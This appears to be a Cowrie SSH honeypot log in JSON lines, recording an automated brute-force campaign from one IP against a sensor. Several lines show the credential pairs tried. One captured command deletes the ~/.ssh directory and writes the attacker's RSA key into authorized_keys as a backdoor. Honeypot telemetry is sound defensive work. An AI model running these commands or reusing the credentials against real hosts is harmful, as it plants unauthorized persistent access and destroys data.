{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:11:38.534403Z","src_ip":"212.227.235.229","session":"54ef902f720d"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:11:38.536689Z","src_ip":"212.227.235.229","session":"736051cdaac0"}
{"eventid":"cowrie.login.failed","username":"audit","password":"12345","message":"login attempt [audit/12345] failed","sensor":"my-vps","timestamp":"2025-09-08T22:11:39.604239Z","src_ip":"212.227.235.229","session":"54ef902f720d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46714,"dst_ip":"1.2.3.4","dst_port":22,"session":"267ef4214f7f","protocol":"ssh","message":"New connection: 212.227.235.229:46714 (1.2.3.4:22) [session: 267ef4214f7f]","sensor":"my-vps","timestamp":"2025-09-08T22:11:39.810568Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:11:40.770189Z","src_ip":"212.227.235.229","session":"267ef4214f7f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:11:40.770897Z","src_ip":"212.227.235.229","session":"267ef4214f7f"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:11:40.863640Z","src_ip":"212.227.235.229","session":"54ef902f720d"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:11:41.772199Z","src_ip":"212.227.235.229","session":"267ef4214f7f"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:11:42.771070Z","src_ip":"212.227.235.229","session":"267ef4214f7f"}
{"eventid":"cowrie.session.closed","duration":"11.7","message":"Connection lost after 11.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:11:42.971348Z","src_ip":"212.227.235.229","session":"2bb6de0c2171"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48410,"dst_ip":"1.2.3.4","dst_port":22,"session":"1ec5991df1e3","protocol":"ssh","message":"New connection: 212.227.235.229:48410 (1.2.3.4:22) [session: 1ec5991df1e3]","sensor":"my-vps","timestamp":"2025-09-08T22:11:57.354222Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:11:57.355452Z","src_ip":"212.227.235.229","session":"1ec5991df1e3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:11:57.528668Z","src_ip":"212.227.235.229","session":"1ec5991df1e3"}
{"eventid":"cowrie.login.success","username":"root","password":"@dmin_11","message":"login attempt [root/@dmin_11] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:11:58.266891Z","src_ip":"212.227.235.229","session":"1ec5991df1e3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:11:58.664884Z","src_ip":"212.227.235.229","session":"1ec5991df1e3"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:11:58.665589Z","src_ip":"212.227.235.229","session":"1ec5991df1e3"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:11:58.666907Z","src_ip":"212.227.235.229","session":"1ec5991df1e3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:11:58.843372Z","src_ip":"212.227.235.229","session":"1ec5991df1e3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:11:59.262247Z","src_ip":"212.227.235.229","session":"1ec5991df1e3"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:11:59.263170Z","src_ip":"212.227.235.229","session":"1ec5991df1e3"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:11:59.438572Z","src_ip":"212.227.235.229","session":"1ec5991df1e3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:11:59.439739Z","src_ip":"212.227.235.229","session":"1ec5991df1e3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48418,"dst_ip":"1.2.3.4","dst_port":22,"session":"182c8d9ccb61","protocol":"ssh","message":"New connection: 212.227.235.229:48418 (1.2.3.4:22) [session: 182c8d9ccb61]","sensor":"my-vps","timestamp":"2025-09-08T22:11:59.621296Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:11:59.622279Z","src_ip":"212.227.235.229","session":"182c8d9ccb61"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:11:59.798759Z","src_ip":"212.227.235.229","session":"182c8d9ccb61"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:12:00.545966Z","src_ip":"212.227.235.229","session":"182c8d9ccb61"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:12:01.725297Z","src_ip":"212.227.235.229","session":"182c8d9ccb61"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48428,"dst_ip":"1.2.3.4","dst_port":22,"session":"cbca96b3eb5f","protocol":"ssh","message":"New connection: 212.227.235.229:48428 (1.2.3.4:22) [session: cbca96b3eb5f]","sensor":"my-vps","timestamp":"2025-09-08T22:12:01.881225Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:12:01.882014Z","src_ip":"212.227.235.229","session":"cbca96b3eb5f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:12:02.047597Z","src_ip":"212.227.235.229","session":"cbca96b3eb5f"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:12:02.753447Z","src_ip":"212.227.235.229","session":"cbca96b3eb5f"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:12:02.921075Z","src_ip":"212.227.235.229","session":"cbca96b3eb5f"}
{"eventid":"cowrie.session.closed","duration":"5.6","message":"Connection lost after 5.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:12:02.922089Z","src_ip":"212.227.235.229","session":"1ec5991df1e3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36146,"dst_ip":"1.2.3.4","dst_port":22,"session":"c76c1855e68b","protocol":"ssh","message":"New connection: 212.227.235.229:36146 (1.2.3.4:22) [session: c76c1855e68b]","sensor":"my-vps","timestamp":"2025-09-08T22:12:03.909525Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:12:03.910363Z","src_ip":"212.227.235.229","session":"c76c1855e68b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:12:04.206687Z","src_ip":"212.227.235.229","session":"c76c1855e68b"}
{"eventid":"cowrie.login.failed","username":"odoo","password":"Welcome1","message":"login attempt [odoo/Welcome1] failed","sensor":"my-vps","timestamp":"2025-09-08T22:12:05.428050Z","src_ip":"212.227.235.229","session":"c76c1855e68b"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:12:06.724246Z","src_ip":"212.227.235.229","session":"c76c1855e68b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33688,"dst_ip":"1.2.3.4","dst_port":22,"session":"d0891e0d6fd9","protocol":"ssh","message":"New connection: 212.227.235.229:33688 (1.2.3.4:22) [session: d0891e0d6fd9]","sensor":"my-vps","timestamp":"2025-09-08T22:12:08.913127Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:12:08.944928Z","src_ip":"212.227.235.229","session":"d0891e0d6fd9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:12:09.257519Z","src_ip":"212.227.235.229","session":"d0891e0d6fd9"}
{"eventid":"cowrie.login.failed","username":"db2fenc","password":"Welcome1","message":"login attempt [db2fenc/Welcome1] failed","sensor":"my-vps","timestamp":"2025-09-08T22:12:10.338772Z","src_ip":"212.227.235.229","session":"d0891e0d6fd9"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:12:11.544152Z","src_ip":"212.227.235.229","session":"d0891e0d6fd9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60540,"dst_ip":"1.2.3.4","dst_port":22,"session":"94ccdf5050ff","protocol":"ssh","message":"New connection: 212.227.235.229:60540 (1.2.3.4:22) [session: 94ccdf5050ff]","sensor":"my-vps","timestamp":"2025-09-08T22:12:11.642978Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:12:11.643670Z","src_ip":"212.227.235.229","session":"94ccdf5050ff"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:12:11.973478Z","src_ip":"212.227.235.229","session":"94ccdf5050ff"}
{"eventid":"cowrie.login.failed","username":"usertest","password":"qwerty","message":"login attempt [usertest/qwerty] failed","sensor":"my-vps","timestamp":"2025-09-08T22:12:13.322066Z","src_ip":"212.227.235.229","session":"94ccdf5050ff"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:12:14.651945Z","src_ip":"212.227.235.229","session":"94ccdf5050ff"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50186,"dst_ip":"1.2.3.4","dst_port":22,"session":"7ea70fe21bf3","protocol":"ssh","message":"New connection: 212.227.235.229:50186 (1.2.3.4:22) [session: 7ea70fe21bf3]","sensor":"my-vps","timestamp":"2025-09-08T22:12:31.570856Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:12:31.571828Z","src_ip":"212.227.235.229","session":"7ea70fe21bf3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:12:31.861967Z","src_ip":"212.227.235.229","session":"7ea70fe21bf3"}
{"eventid":"cowrie.login.failed","username":"samsung","password":"Password123","message":"login attempt [samsung/Password123] failed","sensor":"my-vps","timestamp":"2025-09-08T22:12:33.063751Z","src_ip":"212.227.235.229","session":"7ea70fe21bf3"}
